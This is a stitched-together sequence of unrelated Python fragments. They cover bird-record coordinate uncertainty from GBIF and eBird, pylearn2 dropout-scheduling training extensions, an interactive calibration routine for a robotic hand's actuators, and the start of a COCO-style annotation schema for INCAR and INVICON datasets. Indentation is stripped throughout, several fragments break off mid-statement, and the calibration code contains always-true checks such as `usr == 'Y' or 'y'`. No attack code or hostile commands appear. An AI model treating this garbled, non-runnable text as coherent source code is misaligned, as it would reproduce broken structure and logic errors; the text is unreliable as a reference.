gbif_nogeo["radius_m"] = filter_set["default_coordUncertainty"]
if filter_set["default_coordUncertainty"] is None:
print("Approximating coordinate uncertanties for GBIF records")
#gbif_nogeo.fillna({"coordinatePrecision": 0.00001}, inplace=True)
gbif_nogeo["radius_m"] = gbif_nogeo["gps_accuracy_m"] + gbif_nogeo["detection_distance_m"] + gbif_nogeo["effort_distance_m"]
# Records from EBD
ebd_geo = df_unfiltered[df_unfiltered["source"] == "eBird"].copy()
if ebd_geo.empty == False:
#ebd_geo.fillna({"coordinatePrecision": 0.00001}, inplace=True)
ebd_geo["gps_accuracy_m"] = np.where(ebd_geo["eventDate"].apply(lambda x: datetime.strptime(x, "%Y-%m-%d").year) < 2000, 100, 30)
ebd_geo["radius_m"] = ebd_geo["effort_distance_m"] + ebd_geo["gps_accuracy_m"] + ebd_geo["detection_distance_m"]
# Records from EOD (via GBIF)
eod_nogeo = df_unfiltered[(df_unfiltered["source"] == "GBIF") & (df_unfiltered["collectionCode"].str.contains("EBIRD*") == | |
from pylearn2.space import NullSpace
from theano import config
from pylearn2.utils import sharedX
import functools
import numpy as np
from pylearn2.train_extensions import TrainExtension
class DropoutScaler(TrainExtension):
def __init__(self, estimate_set = "train"):
self.estimate_set = estimate_set
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
'''
if layer.layer_name not in algorithm.cost.input_include_probs:
algorithm.cost.input_include_probs[layer.layer_name] = algorithm.cost.default_input_include_prob
algorithm.cost.input_include_probs[layer.layer_name] = sharedX(algorithm.cost.input_include_probs[layer.layer_name])
if layer.layer_name not in algorithm.cost.input_scales:
algorithm.cost.input_scales[layer.layer_name] = algorithm.cost.default_input_scale
algorithm.cost.input_scales[layer.layer_name] = sharedX(algorithm.cost.input_scales[layer.layer_name])
'''
channel_name = self.estimate_set + "_" + layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name=channel_name + "_dropout_scale",
ipt=None,
val=algorithm.cost.input_scales[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
@functools.wraps(TrainExtension.on_monitor)
def on_monitor(self, model, dataset, algorithm):
monitor = model.monitor
channels = monitor.channels
for i in range(1, len(model.layers)):
channel_name = self.estimate_set + "_" + model.layers[i - 1].layer_name + "_percentage_activated"
channel = channels[channel_name]
val_record = channel.val_record
last_activation_estimate = val_record[-1]
dropout_include_prob = 0.25 / last_activation_estimate
if dropout_include_prob < 0.2:
dropout_include_prob = 0.2
elif dropout_include_prob > 0.8:
dropout_include_prob = 0.8
dropout_scale = 1.0 / dropout_include_prob
#algorithm.cost.input_include_probs[layer.layer_name] = dropout_include_prob
#algorithm.cost.input_scales[layer.layer_name] = dropout_scale
algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(np.cast[config.floatX](dropout_include_prob))
algorithm.cost.input_scales[model.layers[i].layer_name].set_value(np.cast[config.floatX](dropout_scale))
class DropoutSwitcher(TrainExtension):
def __init__(self, trigger_epochs, dropout_prob_values, scale_learning_rate = False):
self.trigger_epochs = trigger_epochs
self.dropout_prob_values = dropout_prob_values
self.scale_learning_rate = scale_learning_rate
self.count = 0
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
'''
if layer.layer_name not in algorithm.cost.input_include_probs:
algorithm.cost.input_include_probs[layer.layer_name] = algorithm.cost.default_input_include_prob
algorithm.cost.input_include_probs[layer.layer_name] = sharedX(algorithm.cost.input_include_probs[layer.layer_name])
if layer.layer_name not in algorithm.cost.input_scales:
algorithm.cost.input_scales[layer.layer_name] = algorithm.cost.default_input_scale
algorithm.cost.input_scales[layer.layer_name] = sharedX(algorithm.cost.input_scales[layer.layer_name])
'''
channel_name = layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name=channel_name + "_dropout_scale",
ipt=None,
val=algorithm.cost.input_scales[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
if self.scale_learning_rate:
drop_product = 0.0
for i in range(0, len(model.layers)):
drop_product += algorithm.cost.input_include_probs[model.layers[i].layer_name].get_value()
drop_product /= len(model.layers)
model.layers[-1].W_lr_scale = drop_product * drop_product
self.count += 1
@functools.wraps(TrainExtension.on_monitor)
def on_monitor(self, model, dataset, algorithm):
monitor = model.monitor
channels = monitor.channels
for i in range(len(self.trigger_epochs)):
if self.trigger_epochs[i] == self.count:
for layer_name in self.dropout_prob_values[i]:
dropout_include_prob = self.dropout_prob_values[i][layer_name]
dropout_scale = 1.0 / dropout_include_prob
algorithm.cost.input_include_probs[layer_name].set_value(np.cast[config.floatX](dropout_include_prob))
algorithm.cost.input_scales[layer_name].set_value(np.cast[config.floatX](dropout_scale))
if self.scale_learning_rate:
drop_product = 0.0
for i in range(0, len(model.layers)):
drop_product += algorithm.cost.input_include_probs[model.layers[i].layer_name].get_value()
drop_product /= len(model.layers)
model.layers[-1].W_lr_scale = drop_product * drop_product
break
self.count += 1
class DropoutActivationLinearScaler(TrainExtension):
def __init__(self, decay_factor, min_incl_prob, max_incl_prob, target_act_fraction, max_target_act_fraction, estimate_set = "train"):
self.decay_factor = decay_factor
self.min_incl_prob = min_incl_prob
self.max_incl_prob = max_incl_prob
self.target_act_fraction = sharedX(target_act_fraction)
self.max_target_act_fraction = max_target_act_fraction
self.estimate_set = estimate_set
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
if layer_name in algorithm.cost.input_include_probs:
channel_name = self.estimate_set + "_" + layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name=channel_name + "_dropout_scale",
ipt=None,
val=algorithm.cost.input_scales[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name="target_act_fraction",
ipt=None,
val=self.target_act_fraction,
data_specs=(NullSpace(), ''),
dataset=dataset)
@functools.wraps(TrainExtension.on_monitor)
def on_monitor(self, model, dataset, algorithm):
monitor = model.monitor
channels = monitor.channels
droppable_layer_sequence = []
for i in range(0, len(model.layers)):
if model.layers[i].layer_name in algorithm.cost.input_include_probs:
droppable_layer_sequence.append(model.layers[i].layer_name)
for i in range(1, len(droppable_layer_sequence)):
if droppable_layer_sequence[i] not in algorithm.cost.constant_layers:
prev_l_name = droppable_layer_sequence[i - 1]
channel_name = self.estimate_set + "_" + prev_l_name + "_percentage_activated"
channel = channels[channel_name]
val_record = channel.val_record
last_activation_estimate = val_record[-1]
dropout_include_prob = self.target_act_fraction.get_value() / last_activation_estimate
if dropout_include_prob < self.min_incl_prob:
dropout_include_prob = self.min_incl_prob
elif dropout_include_prob > self.max_incl_prob:
dropout_include_prob = self.max_incl_prob
algorithm.cost.set_dropout_value(droppable_layer_sequence[i], dropout_include_prob)
act_frac_val = self.target_act_fraction.get_value()
act_frac_val += self.decay_factor
if act_frac_val > self.max_target_act_fraction:
act_frac_val = self.max_target_act_fraction
self.target_act_fraction.set_value(np.cast[config.floatX](act_frac_val))
if droppable_layer_sequence[0] not in algorithm.cost.constant_layers:
l0_dropout_include_prob = self.target_act_fraction.get_value() * 2
if l0_dropout_include_prob > self.max_incl_prob:
l0_dropout_include_prob = self.max_incl_prob
elif l0_dropout_include_prob < self.min_incl_prob:
l0_dropout_include_prob = self.min_incl_prob
algorithm.cost.set_dropout_value(droppable_layer_sequence[0], l0_dropout_include_prob)
class DropoutActivationSetter(TrainExtension):
def __init__(self, min_incl_prob, max_incl_prob, target_act_fraction, estimate_set = "train"):
self.min_incl_prob = min_incl_prob
self.max_incl_prob = max_incl_prob
self.target_act_fraction = sharedX(target_act_fraction)
self.estimate_set = estimate_set
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
channel_name = self.estimate_set + "_" + layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name=channel_name + "_dropout_scale",
ipt=None,
val=algorithm.cost.input_scales[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name="target_act_fraction",
ipt=None,
val=self.target_act_fraction,
data_specs=(NullSpace(), ''),
dataset=dataset)
@functools.wraps(TrainExtension.on_monitor)
def on_monitor(self, model, dataset, algorithm):
monitor = model.monitor
channels = monitor.channels
for i in range(1, len(model.layers)):
channel_name = self.estimate_set + "_" + model.layers[i - 1].layer_name + "_percentage_activated"
channel = channels[channel_name]
val_record = channel.val_record
last_activation_estimate = val_record[-1]
dropout_include_prob = self.target_act_fraction.get_value() / last_activation_estimate
if dropout_include_prob < self.min_incl_prob:
dropout_include_prob = self.min_incl_prob
elif dropout_include_prob > self.max_incl_prob:
dropout_include_prob = self.max_incl_prob
dropout_scale = 1.0 / dropout_include_prob
#algorithm.cost.input_include_probs[layer.layer_name] = dropout_include_prob
#algorithm.cost.input_scales[layer.layer_name] = dropout_scale
algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(np.cast[config.floatX](dropout_include_prob))
algorithm.cost.input_scales[model.layers[i].layer_name].set_value(np.cast[config.floatX](dropout_scale))
#l0_dropout_include_prob = self.target_act_fraction.get_value() * 2
#if l0_dropout_include_prob > self.max_incl_prob:
# l0_dropout_include_prob = self.max_incl_prob
#elif l0_dropout_include_prob < self.min_incl_prob:
# l0_dropout_include_prob = self.min_incl_prob
#algorithm.cost.input_include_probs[model.layers[0].layer_name].set_value(np.cast[config.floatX](l0_dropout_include_prob))
#algorithm.cost.input_scales[model.layers[0].layer_name].set_value(np.cast[config.floatX](1.0 / l0_dropout_include_prob))
class DropoutActivationExponentialScaler(TrainExtension):
def __init__(self, decay_factor, min_incl_prob, max_incl_prob, target_act_fraction, max_target_act_fraction, estimate_set = "train"):
self.decay_factor = decay_factor
self.min_incl_prob = min_incl_prob
self.max_incl_prob = max_incl_prob
self.target_act_fraction = sharedX(target_act_fraction)
self.max_target_act_fraction = max_target_act_fraction
self.estimate_set = estimate_set
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
channel_name = self.estimate_set + "_" + layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name=channel_name + "_dropout_scale",
ipt=None,
val=algorithm.cost.input_scales[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name="target_act_fraction",
ipt=None,
val=self.target_act_fraction,
data_specs=(NullSpace(), ''),
dataset=dataset)
@functools.wraps(TrainExtension.on_monitor)
def on_monitor(self, model, dataset, algorithm):
monitor = model.monitor
channels = monitor.channels
for i in range(1, len(model.layers)):
channel_name = self.estimate_set + "_" + model.layers[i - 1].layer_name + "_percentage_activated"
channel = channels[channel_name]
val_record = channel.val_record
last_activation_estimate = val_record[-1]
dropout_include_prob = self.target_act_fraction.get_value() / last_activation_estimate
if dropout_include_prob < self.min_incl_prob:
dropout_include_prob = self.min_incl_prob
elif dropout_include_prob > self.max_incl_prob:
dropout_include_prob = self.max_incl_prob
dropout_scale = 1.0 / dropout_include_prob
#algorithm.cost.input_include_probs[layer.layer_name] = dropout_include_prob
#algorithm.cost.input_scales[layer.layer_name] = dropout_scale
algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(np.cast[config.floatX](dropout_include_prob))
algorithm.cost.input_scales[model.layers[i].layer_name].set_value(np.cast[config.floatX](dropout_scale))
act_frac_val = self.target_act_fraction.get_value()
act_frac_val *= self.decay_factor
if act_frac_val > self.max_target_act_fraction:
act_frac_val = self.max_target_act_fraction
self.target_act_fraction.set_value(np.cast[config.floatX](act_frac_val))
l0_dropout_include_prob = algorithm.cost.input_include_probs[model.layers[1].layer_name].get_value()
algorithm.cost.input_include_probs[model.layers[0].layer_name].set_value(np.cast[config.floatX](l0_dropout_include_prob))
algorithm.cost.input_scales[model.layers[0].layer_name].set_value(np.cast[config.floatX](1.0 / l0_dropout_include_prob))
class DropoutLinearAnnealer(TrainExtension):
def __init__(self, decay_factor, max_incl_prob):
self.decay_factor = decay_factor
self.max_incl_prob = max_incl_prob
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
channel_name = layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name=channel_name + "_dropout_scale",
ipt=None,
val=algorithm.cost.input_scales[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
@functools.wraps(TrainExtension.on_monitor)
def on_monitor(self, model, dataset, algorithm):
for i in range(0, len(model.layers)):
if model.layers[i].layer_name in algorithm.cost.input_include_probs:
dropout_prob = algorithm.cost.input_include_probs[model.layers[i].layer_name].get_value()
dropout_prob += self.decay_factor
if dropout_prob > self.max_incl_prob:
dropout_prob = self.max_incl_prob
algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(np.cast[config.floatX](dropout_prob))
algorithm.cost.input_scales[model.layers[i].layer_name].set_value(np.cast[config.floatX](1.0 / dropout_prob))
class DropoutLinearMeanActivationSetter(TrainExtension):
def __init__(self, min_keep_prob = 0.4, max_keep_prob = 0.8, estimate_set = "train"):
self.min_keep_prob = min_keep_prob
self.max_keep_prob = max_keep_prob
self.estimate_set = estimate_set
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
channel_name = layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name=channel_name + "_dropout_scale",
ipt=None,
val=algorithm.cost.input_scales[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
@functools.wraps(TrainExtension.on_monitor)
def on_monitor(self, model, dataset, algorithm):
monitor = model.monitor
channels = monitor.channels
for i in range(1, len(model.layers)):
channel_name = self.estimate_set + "_" + model.layers[i - 1].layer_name + "_mean_activation"
channel = channels[channel_name]
val_record = channel.val_record
last_activation_estimate = val_record[-1]
act_scaled = (last_activation_estimate - 0.01) / (0.4 - 0.01)
if act_scaled < 0.0:
act_scaled = 0.0
elif act_scaled > 1.0:
act_scaled = 1.0
dropout_prob = act_scaled * (self.max_keep_prob - self.min_keep_prob) + self.min_keep_prob
algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(np.cast[config.floatX](dropout_prob))
algorithm.cost.input_scales[model.layers[i].layer_name].set_value(np.cast[config.floatX](1.0 / dropout_prob))
class DropoutExponentialAnnealer(TrainExtension):
def __init__(self, decay_factor, max_incl_prob, scale_learning_rate = False, keep_input_constant = False):
self.decay_factor = decay_factor
self.max_incl_prob = max_incl_prob
self.scale_learning_rate = scale_learning_rate
self.keep_input_constant = keep_input_constant
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
channel_name = layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
monitor.add_channel(
name=channel_name + "_dropout_scale",
ipt=None,
val=algorithm.cost.input_scales[layer_name],
data_specs=(NullSpace(), ''),
dataset=dataset)
if self.scale_learning_rate:
drop_product = 0.0
for i in range(0, len(model.layers)):
if model.layers[i].layer_name in algorithm.cost.input_include_probs:
drop_product += algorithm.cost.input_include_probs[model.layers[i].layer_name].get_value()
drop_product /= len(model.layers)
model.layers[-1].W_lr_scale = drop_product * drop_product
@functools.wraps(TrainExtension.on_monitor)
def on_monitor(self, model, dataset, algorithm):
start_it = 0
if self.keep_input_constant:
start_it = 1
for i in range(start_it, len(model.layers)):
if model.layers[i].layer_name in algorithm.cost.input_include_probs:
dropout_prob = algorithm.cost.input_include_probs[model.layers[i].layer_name].get_value()
dropout_prob *= self.decay_factor
if dropout_prob > self.max_incl_prob:
dropout_prob = self.max_incl_prob
algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(np.cast[config.floatX](dropout_prob))
algorithm.cost.input_scales[model.layers[i].layer_name].set_value(np.cast[config.floatX](1.0 / dropout_prob))
if self.scale_learning_rate:
drop_product = 0.0
for i in range(0, len(model.layers)):
if model.layers[i].layer_name in algorithm.cost.input_include_probs:
drop_product += algorithm.cost.input_include_probs[model.layers[i].layer_name].get_value()
drop_product /= len(model.layers)
model.layers[-1].W_lr_scale = drop_product * drop_product
class DropoutExponentialAnnealerLayerwise(TrainExtension):
def __init__(self, decay_factor, max_incl_prob):
self.decay_factor = decay_factor
self.max_incl_prob = max_incl_prob
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
channel_name = layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
| |
self.robot.iq_compensation = iq_compensation
return True
def calibration_geometry(self):
# Mark instance as un-started, uninitialized
self.robot.booted = False
self.robot.initialized = False
# Calibrate the geometry of the whole hand.
# Ping all actuators
error = self.ping() # 4 bit respectively for INDEX, INDEX_M, THUMB, Dynamixel
if error:
print("One or more actuators offline. Exiting...")
return False
if not self.bypass_DXL:
# Calibrate Palm actuator first
# Home INDEX finger
usr = input(
"Move all the finger to their home positions\nand put INDEX fingers in parallel, then press enter.")
self.DC.set_homing_offset(0)
self.robot.palm.home = self.DC.get_present_position()
print("Palm home set.")
else:
self.robot.palm.home = 0
self.MC.init_driver_all()
# Set Mode
self.MC.set_mode_all('velocity')
# Set Limits
for f in self.robot.fingerlist:
# Limits
self.MC.pbm.set_limit_iq_max((f.motor_id, 1.5))
self.MC.pbm.set_limit_velocity_max((f.motor_id, 2 * VEL_CAL))
# Home Dynamixel to the parallel position
if self.bypass_DXL:
usr = input("Move the index fingers to the parallel gesture then press enter.")
else:
# DXL not bypassed, automatic go to parallel.
usr = input("Press ENTER to change to Pinch...")
self.DC.set_mode("position") # Position mode
self.DC.torque_enable(1) # Enable
self.DC.set_goal_position(self.robot.palm.home + math.pi * 7 / 15)
time.sleep(0.5)
usr = input("If everything looks alright press enter to continue, INDEX fingers will return to Parallel.\n"
"Otherwise, press E and enter to exit.")
if usr == 'E' or usr == 'e':
return
else:
self.DC.set_goal_position(self.robot.palm.home)
time.sleep(0.5)
# Home finger
# Get home
usr = input("Auto set home? (y/n)")
if usr == "n" or usr == "N":
usr = input("Move all the finger to the home position then press enter.")
elif usr == "y" or usr == "Y":
# Look for home automatically
running = [True, True, True]
# Enable Torque
self.MC.torque_enable_all(1)
time.sleep(0.1)
# Goal Velocity
for f in self.robot.fingerlist:
if f.mirrored:
goal_velocity = -VEL_CAL
else:
goal_velocity = VEL_CAL
self.MC.pbm.set_goal_velocity((f.motor_id, goal_velocity))
home_i = [0, 0, 0]
detect_count = [0, 0, 0]
print("Looking for home...")
while sum(running):
try:
status = None
while status is None:
status = self.MC.pbm.bulk_read(self.robot.finger_ids, ['present_velocity', 'present_iq'],
error_mode=1)
# status = self.MC.pbm.get_bulk_status((INDEX.motor_id, 'present_velocity', 'present_iq'),
# (INDEX_M.motor_id, 'present_velocity', 'present_iq'),
# (THUMB.motor_id, 'present_velocity', 'present_iq'))
err = [i[1] for i in status]
vels = [i[0][0] for i in status]
iq = [i[0][1] for i in status]
for i in range(3):
if abs(vels[i]) < VEL_CAL_DETECT and abs(iq[i]) > IQ_CAL_DETECT:
if detect_count[i] > 5:
print("%s HOME reached." % self.robot.fingerlist[i].name)
# home_i[i] = iq[i]
# print("%s home_i acquired." % robot.fingerlist[i].name)
self.MC.torque_enable(self.robot.finger_ids[i], 0)
# print("End iq was %2.2f" % home_i[i])
# print("End velocity was %2.2f" % vels[i])
running[i] = False
else:
detect_count[i] += 1
if err[i] != 128:
print("%s BEAR error, code:" % self.robot.fingerlist[i].name, bin(err[i]))
except KeyboardInterrupt:
running = [0]
self.MC.torque_enable_all(0)
print("User interrupted.")
# Check if HOMING_OFFSET need to be updated
finger_homing_error = []
for idx, f in enumerate(self.robot.fingerlist):
present_pos = self.MC.pbm.get_present_position(f.motor_id)[0][0][0]
if abs(present_pos) > 0.15:
# If the present position is away from zero for more than 0.05rad (~2.8deg)
finger_homing_error.append([f, present_pos])
if finger_homing_error:
# If there is any finger that needs update
print("The following finger's HOMING_OFFSET needs to be updated:")
for i in finger_homing_error:
print(i[0].name + ", homing error: " + str(i[1]))
usr = input("Press ENTER to continue, or I if you insist to ignore.")
if usr == 'I':
finger_homing_error = []
else:
# No finger needs update
print("All HOMING_OFFSET settings are fine.")
usr = input("Press ENTER to continue, or C if you insist to reset HOMING_OFFSET for all fingers.")
if usr == 'C':
# User insist to reset HOMING_OFFSET for all fingers
for f in self.robot.fingerlist:
finger_homing_error.append([f, 0])
if finger_homing_error:
# If there is any finger to be updated
# Clear HOMING_OFFSET
for i in finger_homing_error:
m_id = i[0].motor_id
self.MC.pbm.set_homing_offset((m_id, 0))
# Check setting
check = False
trial_count = 1
# debug_temp = motor_controller.pbm.get_homing_offset(m_id, m_id, m_id)
while not check:
try:
if abs(self.MC.pbm.get_homing_offset(m_id)[0][0][0]) < 1:
check = True
print("HOMING_OFFSET cleared for %s. Trails: %d." % (i[0].name, trial_count))
else:
self.MC.pbm.set_homing_offset((m_id, 0))
time.sleep(0.05)
trial_count += 1
except KeyboardInterrupt:
check = True
print("User interrupted.")
# Wait for 0.2 sec after setting HOMING_OFFSET
time.sleep(0.2)
# Get home_offset
for i in finger_homing_error:
i[0].homing_offset = -(self.MC.pbm.get_present_position(i[0].motor_id)[0][0][0])
# print(home_offset)
# Set Homing_Offset
for i in finger_homing_error:
m_id = i[0].motor_id
homing_offset = i[0].homing_offset
self.MC.pbm.set_homing_offset((m_id, homing_offset))
# time.sleep(0.05)
# Check setting
check = False
trial_count = 1
while not check:
try:
temp = self.MC.pbm.get_homing_offset(m_id)[0][0][0]
print("Current homing_offset: % 2.2f" % temp)
if abs(self.MC.pbm.get_homing_offset(m_id)[0][0][0] - homing_offset) < 0.01:
check = True
print("HOMING_OFFSET updated for %s. Trails: %d." % (i[0].name, trial_count))
else:
self.MC.pbm.set_homing_offset((m_id, homing_offset))
# time.sleep(0.05)
trial_count += 1
except KeyboardInterrupt:
check = True
print("User interrupted.")
# Wait for 0.2 sec after setting HOMING_OFFSET
time.sleep(0.2)
print("HOMING_OFFSET all updated.")
# Final check
for i in finger_homing_error:
m_id = i[0].motor_id
pos = self.MC.pbm.get_present_position(m_id)[0][0][0]
if abs(pos) < 0.01:
print("%s homed." % i[0].name)
else:
print("%s homing abnormal!" % i[0].name) # TODO: throw exception
usr = input("Continue? (Y/N)")
if usr == 'Y' or 'y':
pass
else:
return
# Update all finger.homing_offset
for f in self.robot.fingerlist:
f.homing_offset = self.MC.pbm.get_homing_offset(f.motor_id)[0][0][0]
if not self.bypass_ext_enc:
self.ext_enc.connect()
time.sleep(0.5)
data = self.ext_enc.get_angle()
self.ext_enc.release()
for idx, f in enumerate(self.robot.fingerlist):
f.encoder_offset = data[idx]
# Get end_pos
usr = input("Auto set the end limit? (y/n)")
if usr == "n" or usr == "N":
usr = input("Move all the fingers to the end limit and press enter.\n")
end_pos = self.MC.pbm.get_present_position(INDEX.motor_id, INDEX_M.motor_id, THUMB.motor_id)
for idx, i in enumerate(end_pos):
self.robot.fingerlist[idx].travel = i[0][0]
print("end_pos recorded as:", self.robot.fingerlist[idx].name, self.robot.fingerlist[idx].travel)
elif usr == "y" or usr == "Y":
# Look for End-Pos automatically
running = [True, True, True]
# Enable Torque
self.MC.torque_enable_all(1)
time.sleep(0.1)
# Goal Velocity
for f in self.robot.fingerlist:
if f.mirrored:
goal_velocity = VEL_CAL
else:
goal_velocity = -VEL_CAL
self.MC.pbm.set_goal_velocity((f.motor_id, goal_velocity))
time.sleep(0.5)
end_i = [0, 0, 0]
detect_count = [0, 0, 0]
print("Looking for end_pos...")
while sum(running):
try:
status = None
while status is None:
status = self.MC.pbm.bulk_read(self.robot.finger_ids, ['present_velocity', 'present_iq'],
error_mode=1)
# status = motor_controller.pbm.get_bulk_status((INDEX.motor_id, 'present_velocity', 'present_iq'),
# (INDEX_M.motor_id, 'present_velocity', 'present_iq'),
# (THUMB.motor_id, 'present_velocity', 'present_iq'))
err = [i[1] for i in status]
vels = [i[0][0] for i in status]
iq = [i[0][1] for i in status]
for i in range(3):
if abs(vels[i]) < VEL_CAL_DETECT and abs(iq[i]) > IQ_CAL_DETECT:
if detect_count[i] > 20:
# TODO: check total travel value
print("%s end_pos reached." % self.robot.fingerlist[i].name)
self.robot.fingerlist[i].travel = \
self.MC.pbm.get_present_position(self.robot.finger_ids[i])[0][0][0]
print("%s end_pos acquired." % self.robot.fingerlist[i].name)
end_i[i] = iq[i]
print("%s end_i acquired." % self.robot.fingerlist[i].name)
self.MC.torque_enable(self.robot.finger_ids[i], 0)
print("%s end_pos recorded as: % 8.2f" %
(self.robot.fingerlist[i].name, self.robot.fingerlist[i].travel))
print("End iq was %2.2f" % end_i[i])
print("End velocity was %2.2f" % vels[i])
running[i] = False
else:
detect_count[i] += 1
if err[i] != 128:
print("%s BEAR error, code:" % self.robot.fingerlist[i].name, bin(err[i]))
except KeyboardInterrupt:
running = [0]
self.MC.torque_enable_all(0)
end_pos = [0, 0, 0]
print("User interrupted.")
usr = input("Reset fingers? (y/n)")
if usr == "y" or usr == "Y":
for f in self.robot.fingerlist:
self.MC.pbm.set_p_gain_position((f.motor_id, POS_P))
self.MC.pbm.set_i_gain_position((f.motor_id, POS_I))
self.MC.pbm.set_d_gain_position((f.motor_id, POS_D))
self.MC.pbm.set_limit_iq_max((f.motor_id, 1))
time.sleep(0.2)
print("Fingers resetting...")
# Set Mode and Limit
self.MC.set_mode_all('position')
running = [True, True, True]
# Enable torque and go to Home
self.MC.torque_enable_all(1)
self.MC.pbm.set_goal_position((THUMB.motor_id, 0.01), (INDEX.motor_id, 0.01), (INDEX_M.motor_id, 0.01))
time.sleep(1)
while sum(running):
try:
# status = self.MC.pbm.get_bulk_status(
# (INDEX.motor_id, 'present_position'),
# (INDEX_M.motor_id, 'present_position'),
# (THUMB.motor_id, 'present_position'))
status = self.MC.pbm.get_present_position(INDEX.motor_id, INDEX_M.motor_id, THUMB.motor_id)
err = [data[1] for data in status]
position = [data[0][0] for data in status]
for i in range(3):
if abs(position[i]) < 0.08:
running[i] = False
self.MC.torque_enable(self.robot.finger_ids[i], 0)
if err[i] != 128:
print("%s BEAR error, code:" % self.robot.fingerlist[i].name, bin(err[i]))
except KeyboardInterrupt:
running = [0]
print("User interrupted.")
self.MC.torque_enable_all(0)
if not self.bypass_DXL:
self.DC.torque_enable(0)
print("Calibration summary:")
for f in self.robot.fingerlist:
print("%s Motor ID: %d, homing_offset: % 8.2f, travel: % 8.2f, encoder_offset: % 8.2f"
% (f.name, f.motor_id, f.homing_offset, f.travel, f.encoder_offset))
if finger_homing_error:
print("The following fingers' homing_offset has been updated:")
print([i[0].name for i in finger_homing_error])
usr = input("It is recommended to save changed settings. Continue? (y/n)")
if usr == 'Y' or 'y':
for i in finger_homing_error:
self.MC.pbm.save_config(i[0].motor_id)
print("Config saved to BEAR.")
else:
print("Abort saving to BEAR. Please power cycle hardware before using.")
usr = input("Save Data? (y/n)")
if usr == "y" or usr == "Y":
# Build list
data = []
for f in self.robot.fingerlist:
data.append([f.name, | |
<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# # Create INCAR and INVICON MOLA JSON
# version: 2
#
# info:
# - Create standard MOLA JSON
#
# author: <NAME>
"""
# ## MOLA Annotations Data Format
# If you wish to combine multiple datasets, it is often useful to convert them into a unified data format.
#
# Objective:
# In[2]:
#ANNOTATIONS FORMAT (BASED ON COCO)
#Annotations format keys:
{ "info": None,
"licenses": [], #TODO
"categories": [],
"images": [],
"annotations": [],
"videos": [],
"video_annotations": [],
"tracks": [], #TODO - only for Object Tracking
"segment_info": [], #TODO
"datasets": [{'name': 'INCAR', 'id': 1}, {'name': 'INVICON', 'id': 2}]
}
#1 object definition:
info: {
"year": int,
"version": str,
"description": str,
"contributor": str,
"url": str,
"date_created": datetime,
}
license: {
"id": int,
"name": str,
"url": str,
}
category: {
"id": int,
"name": str,
"supercategory": str,
"dataset": int, #dataset_id
}
image: {
"id" : int,
"video_id": int,
"file_name" : str,
"license" : int,
"dataset": int, #dataset_id
# Redundant fields for COCO-compatibility
"width": int,
"height": int,
"frame_index": int, #frame index from original video_id
"date_captured": datetime,
}
